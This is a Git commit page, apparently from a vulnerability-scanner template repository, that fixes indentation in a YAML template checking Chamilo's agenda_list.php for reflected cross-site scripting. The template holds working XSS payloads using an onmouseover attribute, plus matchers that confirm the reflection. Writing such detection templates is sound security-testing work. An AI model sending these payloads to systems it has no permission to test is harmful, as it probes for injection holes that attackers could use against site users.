Merge pull request #1316 from nrathaus/master

Wrong indentation?
patch-1
Sandeep Singh 2021-04-21 01:22:31 +05:30 committed by GitHub
commit 0d3c88bc4a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 13 deletions

View File

@ -13,16 +13,16 @@ requests:
- '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' - '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1' - '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "onmouseover%3dxss(0x01CE61)" - "onmouseover%3dxss(0x01CE61)"
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
part: header part: header
words: words:
- "text/html" - "text/html"